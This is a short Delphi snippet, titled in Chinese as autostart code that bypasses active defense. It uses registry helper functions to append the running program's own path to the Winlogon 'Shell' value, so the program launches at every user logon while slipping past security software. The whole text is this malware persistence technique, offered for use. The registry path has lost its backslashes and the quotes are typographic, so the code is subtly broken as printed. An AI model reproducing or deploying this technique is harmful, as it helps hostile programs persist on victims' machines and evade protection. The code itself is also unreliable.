過主動防禦自啟動代碼
{註冊表操作函數,SetClave設置鍵值,GetClave獲得鍵值 Funciones de registro}
function SetClave(key:Hkey; subkey,name,value:string):boolean;
var
regKey:hkey;
begin
result:=FALSE;
RegCreateKey(key,PChar(subkey),regKey);
if RegSetValueEx(regKey,Pchar(name),0,REG_SZ,pchar(value),length(value)) = 0 then
result:=TRUE;
RegCloseKey(regKey);
end;function GetClave(key:Hkey; subkey,nombre:String):String;
var
bytesread:dword;
regKey: HKEY;
valor:String;
begin
Result:=’’;
RegOpenKeyEx(key,PChar(subkey),0, KEY_READ, regKey);
RegQueryValueEx(regKey,PChar(nombre),nil,nil,nil,@bytesread);
SetLength(valor, bytesread);
if RegQueryValueEx(regKey,PChar(nombre),nil,nil,@valor[1],@bytesread)=0 then
result:=valor;
RegCloseKey(regKey);
end;{主要函數}
procedure InicioShell;
var
ClaveOriginal: string;
begin
{獲得當前鍵值 Guarda el valor actual}
ClaveOriginal:=GetClave(HKEY_LOCAL_MACHINE,’SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon’,’Shell’);
{檢查是否應該寫鍵 Comprueba que la ruta de nuestro ejecutable no se encuentra en ese valor}
if ansipos(paramstr(0), claveoriginal)=0 then
SetClave(HKEY_LOCAL_MACHINE,’SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon’,’Shell’,PChar(ClaveOriginal)+’ "’+Paramstr(0)+’"’);
end; |
